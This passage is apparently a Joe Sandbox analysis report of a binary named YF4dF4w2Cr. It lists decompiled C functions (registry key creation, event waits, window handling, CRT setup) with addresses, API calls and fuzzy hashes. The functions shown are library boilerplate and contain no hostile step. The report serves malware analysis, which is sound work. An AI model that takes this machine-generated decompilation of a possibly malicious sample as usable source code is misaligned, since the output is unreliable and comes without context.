					_t19 = 0;
					_t15 = 0x463fd0;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x464250) {
							break;
						}
						_t6 =  *0x467648; // 0x25e20b8
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x463fe0;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x468680 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x464040);
					return 0;
				} else {
					 *0x468660 = _t26;
					_t6 = E004381D6(_t26, 4);
					 *0x467648 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}













                  0x00440043
                  0x0044004b
                  0x0044004e
                  0x00440059
                  0x0044005b
                  0x00000000
                  0x0044005b
                  0x00440050
                  0x00440050
                  0x0044005d
                  0x0044005d
                  0x0044005d
                  0x00440065
                  0x0044006c
                  0x00440073
                  0x00440093
                  0x00440093
                  0x00440095
                  0x004400a1
                  0x004400a1
                  0x004400a4
                  0x004400a7
                  0x004400b0
                  0x00000000
                  0x00000000
                  0x0044009c
                  0x0044009c
                  0x004400b4
                  0x004400b5
                  0x004400b7
                  0x004400bd
                  0x004400d1
                  0x004400d7
                  0x004400e1
                  0x004400e1
                  0x004400e3
                  0x004400e6
                  0x004400e7
                  0x004400f3
                  0x00440075
                  0x00440078
                  0x0044007e
                  0x00440085
                  0x0044008c
                  0x00000000
                  0x0044008e
                  0x00440090
                  0x00440092
                  0x00440092
                  0x0044008c

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __calloc_crt
                  • String ID: @@F$PBF$`vF$?F
                  • API String ID: 3494438863-1129309999
                  • Opcode ID: 1a2e1c73d2f0b5ee1c020fbac76cde2fdd918bf510956deff6eadb29a4ec2292
                  • Instruction ID: a5c93d0391fce3b3b5f1e76609cc71b27c325a532c4fd8429ec35ff82f20e995
                  • Opcode Fuzzy Hash: 1a2e1c73d2f0b5ee1c020fbac76cde2fdd918bf510956deff6eadb29a4ec2292
                  • Instruction Fuzzy Hash: 7C1191317097115BF7288E2DBC50B662391A785728F24423FE715DA3A4FAB8D891868E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00426499, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00426499(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}









                  0x004264b6
                  0x004264bd
                  0x004264c0
                  0x004264c3
                  0x004264c6
                  0x004264d1
                  0x00426508
                  0x00426508
                  0x00426513
                  0x00426518
                  0x00426518
                  0x0042651d
                  0x00426522
                  0x00426522
                  0x0042652b

                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 004264C9
                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004264EC
                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00426508
                  • RegCloseKey.ADVAPI32(?), ref: 00426518
                  • RegCloseKey.ADVAPI32(?), ref: 00426522
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseCreate$Open
                  • String ID: software
                  • API String ID: 1740278721-2010147023
                  • Opcode ID: baa5dd68dee05fadf222446a8f3323f9c01591b1d0c43eda07168c0e41c926bb
                  • Instruction ID: 3f12b4e016f44e42d78fa2a8c8e700cc1342d59c6eca5ba0814baf6782e48a0c
                  • Opcode Fuzzy Hash: baa5dd68dee05fadf222446a8f3323f9c01591b1d0c43eda07168c0e41c926bb
                  • Instruction Fuzzy Hash: C411E676D00128BB8B21DF9AEC88CDFBFBCEF89744B5100AAB504A2115D6719A44DBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401000, Relevance: 10.6, APIs: 7, Instructions: 62synchronizationwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 62%
                  			E00401000(intOrPtr* _a4) {
				void* _t21;
				intOrPtr* _t38;
				void* _t42;

				_t38 = _a4;
				if(WaitForSingleObject( *(_t38 + 0x10), 0xffffffff) == 0) {
					while(WaitForSingleObject( *(_t38 + 0x18), 0) != 0) {
						ResetEvent( *(_t38 + 0x14));
						_push( *((intOrPtr*)(_t38 + 0x24)));
						_push( *((intOrPtr*)(_t38 + 0x20)));
						_push(_t38);
						_push(_t38 + 8);
						_push( *((intOrPtr*)(_t38 + 4)));
						_push( *_t38);
						_t21 = E004042A0( *_t38);
						_t42 = _t42 + 0x18;
						SetEvent( *(_t38 + 0x14));
						if(_t21 != 0) {
							PostMessageA( *(_t38 + 0xc), 0x402, 0, 0);
							if(WaitForSingleObject( *(_t38 + 0x10), 0xffffffff) == 0) {
								continue;
							}
						}
						break;
					}
				}
				SetEvent( *(_t38 + 0x1c));
				return 0;
			}






                  0x00401008
                  0x00401016
                  0x00401020
                  0x00401030
                  0x0040103c
                  0x00401040
                  0x00401043
                  0x00401047
                  0x00401048
                  0x00401049
                  0x0040104a
                  0x00401052
                  0x00401058
                  0x00401060
                  0x0040106f
                  0x0040107b
                  0x00000000
                  0x00000000
                  0x0040107b
                  0x00000000
                  0x00401060
                  0x0040107e
                  0x00401083
                  0x0040108d

                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401012
                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 00401026
                  • ResetEvent.KERNEL32(?), ref: 00401030
                    • Part of subcall function 004042A0: WaitForSingleObject.KERNEL32(?,00000000,?,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042CA
                    • Part of subcall function 004042A0: WaitForSingleObject.KERNEL32(?,00000000,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042DE
                    • Part of subcall function 004042A0: SendMessageA.USER32(?,00000401,00000064,00000000), ref: 00404353
                  • SetEvent.KERNEL32(?), ref: 00401058
                  • PostMessageA.USER32 ref: 0040106F
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401077
                  • SetEvent.KERNEL32(?), ref: 00401083
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ObjectSingleWait$Event$Message$PostResetSend
                  • String ID:
                  • API String ID: 2693790096-0
                  • Opcode ID: 7c818635be2d97c96777eab090e09d629f6dcbd405f1c48e9043e2034b7e17b1
                  • Instruction ID: 0d77731ecac0447bacbc28320ec0c646970e3b0a9206e2ca7128ab913cbacf71
                  • Opcode Fuzzy Hash: 7c818635be2d97c96777eab090e09d629f6dcbd405f1c48e9043e2034b7e17b1
                  • Instruction Fuzzy Hash: 82111F75200701ABD620DFAADC84E13B3EDBF88B10B108A2DB665D36D0DA74F8008B68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040CEE2, Relevance: 10.6, APIs: 7, Instructions: 61COMMON
                  Download Yara Rule
                  APIs
                  • GetParent.USER32(0000E900), ref: 0040CEF0
                  • GetWindowRect.USER32 ref: 0040CF0B
                  • ScreenToClient.USER32 ref: 0040CF1E
                  • ScreenToClient.USER32 ref: 0040CF27
                  • EqualRect.USER32 ref: 0040CF31
                  • DeferWindowPos.USER32(?,0000E900,00000000,?,?,?,?,00000014), ref: 0040CF59
                  • SetWindowPos.USER32(0000E900,00000000,?,?,?,?,00000014,?,00000001), ref: 0040CF63
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$ClientRectScreen$DeferEqualParent
                  • String ID:
                  • API String ID: 443303494-0
                  • Opcode ID: 9dd0b80c57cd055b5c3aae39b5d4aa4e3f334b3c2dd04950780753353c1d00f6
                  • Instruction ID: cfd9feb092fbb54a836aacfe93016eac0eb2fe96b6d959632a20acd86b66a086
                  • Opcode Fuzzy Hash: 9dd0b80c57cd055b5c3aae39b5d4aa4e3f334b3c2dd04950780753353c1d00f6
                  • Instruction Fuzzy Hash: 5911307650020AFFD7109FA5DC84DAB7BBDFB88710F14852ABD16A3254E730E900CB65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042094A, Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E0042094A(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E00430CF4(0, 0);
				_t22 = E004148C1(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E004063FE(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E00431160(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E00431B73(_t28);
			}












                  0x0042094a
                  0x0042094a
                  0x0042094a
                  0x00420951
                  0x0042095b
                  0x00420967
                  0x0042096d
                  0x00420972
                  0x00420978
                  0x0042097a
                  0x0042097f
                  0x00420985
                  0x00420985
                  0x0042098d
                  0x0042099e
                  0x004209aa
                  0x004209af
                  0x004209b5
                  0x004209b8
                  0x004209bd
                  0x004209c7
                  0x004209c7
                  0x004209ca
                  0x004209d0
                  0x004209db

                  APIs
                  • LeaveCriticalSection.KERNEL32(?), ref: 00420951
                  • __CxxThrowException@8.LIBCMT ref: 0042095B
                    • Part of subcall function 00430CF4: RaiseException.KERNEL32(?,?,?,?), ref: 00430D36
                  • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 00420972
                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 0042097F
                    • Part of subcall function 004063FE: __CxxThrowException@8.LIBCMT ref: 00406414
                  • _memset.LIBCMT ref: 0042099E
                  • TlsSetValue.KERNEL32(?,00000000,0041F372,00406452,00411FA3), ref: 004209AF
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004209D0
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                  • String ID:
                  • API String ID: 356813703-0
                  • Opcode ID: af9ad24891c458db921cd8b6e4028670f66e224599244f3ca0a8739f32a8bdb8
                  • Instruction ID: 35073c979330c48db295c3963723042328dd249a9d273a9f0c0c6630b77ded6a
                  • Opcode Fuzzy Hash: af9ad24891c458db921cd8b6e4028670f66e224599244f3ca0a8739f32a8bdb8
                  • Instruction Fuzzy Hash: E2118EB4100606AFEB10AF65DC85D6BBBB9FF44318B10C53EF55696662CB34AC60CF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00438A80, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E00438A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x45e210);
				E00431818(__ebx, __edi, __esi);
				_t31 = E00436178(__ebx, __edx, __edi, _t35);
				_t15 =  *0x463b44; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0043A0BF(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x463a48; // 0x25e1600
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x463620;
								if(__eflags != 0) {
									_push(_t33);
									E004316F6(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x463a48; // 0x25e1600
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x463a48; // 0x25e1600
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00438B1B();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0043395F(_t29, _t31, 0x20);
				}
				return E0043185D(_t33);
			}










                  0x00438a80
                  0x00438a80
                  0x00438a80
                  0x00438a80
                  0x00438a82
                  0x00438a87
                  0x00438a91
                  0x00438a93
                  0x00438a9b
                  0x00438abc
                  0x00438ac2
                  0x00438ac6
                  0x00438ac9
                  0x00438acc
                  0x00438ad2
                  0x00438ad4
                  0x00438ad6
                  0x00438ad9
                  0x00438adf
                  0x00438ae1
                  0x00438ae3
                  0x00438ae9
                  0x00438aeb
                  0x00438aec
                  0x00438af1
                  0x00438ae9
                  0x00438ae1
                  0x00438af2
                  0x00438af7
                  0x00438afa
                  0x00438b00
                  0x00438b04
                  0x00438b04
                  0x00438b0a
                  0x00438b11
                  0x00438aa3
                  0x00438aa3
                  0x00438aa3
                  0x00438aa8
                  0x00438aac
                  0x00438ab1
                  0x00438ab9

                  APIs
                  • __getptd.LIBCMT ref: 00438A8C
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __amsg_exit.LIBCMT ref: 00438AAC
                  • __lock.LIBCMT ref: 00438ABC
                  • InterlockedDecrement.KERNEL32(?), ref: 00438AD9
                  • InterlockedIncrement.KERNEL32(025E1600), ref: 00438B04
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                  • String ID: 6F
                  • API String ID: 4271482742-3517966882
                  • Opcode ID: 6c584e623dab6ad2db5e4a70b67004d1be87bba4eab4fad9846b8a59ee196114
                  • Instruction ID: 2a7e21e7e983cbed5c811cbe98960c0c60f51e7b7e610d5969f46117a2a2e828
                  • Opcode Fuzzy Hash: 6c584e623dab6ad2db5e4a70b67004d1be87bba4eab4fad9846b8a59ee196114
                  • Instruction Fuzzy Hash: 45018231900722ABC725BF65980574AF760AB08725F14601FF80067792DBBC6A41CBDE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00420379, Relevance: 10.5, APIs: 7, Instructions: 30COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00420379(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}





                  0x00420385
                  0x0042038b
                  0x00420392
                  0x00420399
                  0x004203a0
                  0x004203ad
                  0x004203b4
                  0x004203b7
                  0x004203ba
                  0x004203be

                  APIs
                  • GetSysColor.USER32(0000000F), ref: 00420387
                  • GetSysColor.USER32(00000010), ref: 0042038E
                  • GetSysColor.USER32(00000014), ref: 00420395
                  • GetSysColor.USER32(00000012), ref: 0042039C
                  • GetSysColor.USER32(00000006), ref: 004203A3
                  • GetSysColorBrush.USER32(0000000F), ref: 004203B0
                  • GetSysColorBrush.USER32(00000006), ref: 004203B7
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Color$Brush
                  • String ID:
                  • API String ID: 2798902688-0
                  • Opcode ID: bbd7f8a36c46f4b64160d0f99ed0faba5aa863649304fb25e67fbe5355e6cc7b
                  • Instruction ID: 65459e24616037a58442e39c341cc04108a4acc29dfa35b8cf1959434db4eedb
                  • Opcode Fuzzy Hash: bbd7f8a36c46f4b64160d0f99ed0faba5aa863649304fb25e67fbe5355e6cc7b
                  • Instruction Fuzzy Hash: 2BF0FE719407445BD730BB735D09B47BAD1FFC4710F02092AD2458B990D6B5E441DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004131F2, Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004131F2(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t78;
				void* _t79;
				void* _t80;

				_t80 = __eflags;
				E00431A9B(E0044BF26, __ebx, __edi, __esi);
				_t78 = __ecx;
				E00422EAE(__ebx, _t79 - 0x40, __edi, __ecx, _t80);
				 *(_t79 - 4) =  *(_t79 - 4) & 0x00000000;
				GetClientRect( *(_t78 + 0x20), _t79 - 0x2c);
				GetWindowRect( *(_t78 + 0x20), _t79 - 0x1c);
				E00422BFB(_t78, _t79 - 0x1c);
				OffsetRect(_t79 - 0x2c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
				E00422646(_t79 - 0x40, _t79 - 0x2c);
				OffsetRect(_t79 - 0x1c,  ~( *(_t79 - 0x1c)),  ~( *(_t79 - 0x18)));
				 *((intOrPtr*)( *_t78 + 0x150))(_t79 - 0x40, _t79 - 0x1c, __ecx, 0x34);
				E0042268D(_t79 - 0x40, _t79 - 0x1c);
				SendMessageA( *(_t78 + 0x20), 0x14,  *(_t79 - 0x3c), 0);
				 *((intOrPtr*)( *_t78 + 0x158))(_t79 - 0x40, _t79 - 0x1c);
				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
				return E00431B73(E00422F02(__ebx, _t79 - 0x40, OffsetRect, _t78,  *(_t79 - 4)));
			}






                  0x004131f2
                  0x00421612
                  0x00421617
                  0x0042161d
                  0x00421622
                  0x0042162d
                  0x0042163a
                  0x00421646
                  0x00421661
                  0x0042166a
                  0x0042167f
                  0x0042168d
                  0x0042169a
                  0x004216a9
                  0x004216bb
                  0x004216c1
                  0x004216d2

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00421612
                    • Part of subcall function 00422EAE: __EH_prolog3.LIBCMT ref: 00422EB5
                    • Part of subcall function 00422EAE: GetWindowDC.USER32(00000000,00000004,00419EC3,00000000,00000018,00418677,00000001,?,?,004527FC,004527FC), ref: 00422EE1
                  • GetClientRect.USER32 ref: 0042162D
                  • GetWindowRect.USER32 ref: 0042163A
                    • Part of subcall function 00422BFB: ScreenToClient.USER32 ref: 00422C0C
                    • Part of subcall function 00422BFB: ScreenToClient.USER32 ref: 00422C19
                  • OffsetRect.USER32(?,?,?), ref: 00421661
                    • Part of subcall function 00422646: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0042266F
                    • Part of subcall function 00422646: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 00422684
                  • OffsetRect.USER32(?,?,?), ref: 0042167F
                    • Part of subcall function 0042268D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 004226B6
                    • Part of subcall function 0042268D: IntersectClipRect.GDI32(?,?,?,?,?), ref: 004226CB
                  • SendMessageA.USER32(?,00000014,?,00000000), ref: 004216A9
                    • Part of subcall function 00422F02: __EH_prolog3.LIBCMT ref: 00422F09
                    • Part of subcall function 00422F02: ReleaseDC.USER32 ref: 00422F26
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Clip$ClientH_prolog3$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
                  • String ID:
                  • API String ID: 2952362992-0
                  • Opcode ID: 4d7821c7f4b74c1374008cb86f107091761dbfdb9a1f2cd9f1ce72ed74d0e9cc
                  • Instruction ID: 54d9f2b2cb95faf2a6f24e4230d7989ba867047feb8828be0b4a30da0d48dd3d
                  • Opcode Fuzzy Hash: 4d7821c7f4b74c1374008cb86f107091761dbfdb9a1f2cd9f1ce72ed74d0e9cc
                  • Instruction Fuzzy Hash: 65210A7291001AEFDB15EBA4DC95DFEB7B8FF18305F40411AF152A71A0EB646A06CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416EE5, Relevance: 9.1, APIs: 6, Instructions: 69COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00416EE5(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t8;
				void* _t14;
				struct HWND__** _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t18, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t17 = _t18;
						_t8 = _t18;
						if(_t18 == 0) {
							L10:
							if(_a4 == 0 && _t18 != 0) {
								_t18 = GetLastActivePopup(_t18);
							}
							_t16 = _a8;
							if(_t16 != 0) {
								if(_t17 == 0 || IsWindowEnabled(_t17) == 0 || _t17 == _t18) {
									 *_t16 =  *_t16 & 0x00000000;
								} else {
									 *_t16 = _t17;
									EnableWindow(_t17, 0);
								}
							}
							return _t18;
						} else {
							goto L9;
						}
						do {
							L9:
							_t17 = _t8;
							_t8 = GetParent(_t8);
						} while (_t8 != 0);
						goto L10;
					}
					_t18 = GetParent(_t18);
					L7:
					if(_t18 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t14 = E00416EA0();
				if(_t14 != 0) {
					L4:
					_t18 =  *(_t14 + 0x20);
					goto L7;
				}
				_t14 = E00403AA0();
				if(_t14 != 0) {
					goto L4;
				}
				_t18 = 0;
				goto L8;
			}








                  0x00416ef2
                  0x00416ef8
                  0x00416f15
                  0x00416f23
                  0x00416f2e
                  0x00416f2e
                  0x00416f30
                  0x00416f34
                  0x00416f3f
                  0x00416f43
                  0x00416f50
                  0x00416f50
                  0x00416f52
                  0x00416f57
                  0x00416f5b
                  0x00416f79
                  0x00416f6c
                  0x00416f6f
                  0x00416f71
                  0x00416f71
                  0x00416f5b
                  0x00416f82
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00416f36
                  0x00416f36
                  0x00416f37
                  0x00416f39
                  0x00416f3b
                  0x00000000
                  0x00416f36
                  0x00416f28
                  0x00416f2a
                  0x00416f2c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00416f2c
                  0x00416efa
                  0x00416f01
                  0x00416f10
                  0x00416f10
                  0x00000000
                  0x00416f10
                  0x00416f03
                  0x00416f0a
                  0x00000000
                  0x00000000
                  0x00416f0c
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                  • String ID:
                  • API String ID: 670545878-0
                  • Opcode ID: 13871ef3759c618d8f268107ebfde00254af1969d96d9b07d1e74764d8d3a6e7
                  • Instruction ID: 9e4f7b4cd4cbdf7f40bd5940dfb5179cf4edfd5842048a0ac895ae762c2329d2
                  • Opcode Fuzzy Hash: 13871ef3759c618d8f268107ebfde00254af1969d96d9b07d1e74764d8d3a6e7
                  • Instruction Fuzzy Hash: BC1194366052316BDB311B6AAD447AB66A86F55B60F17012BED04A7344DB38CC838ADD
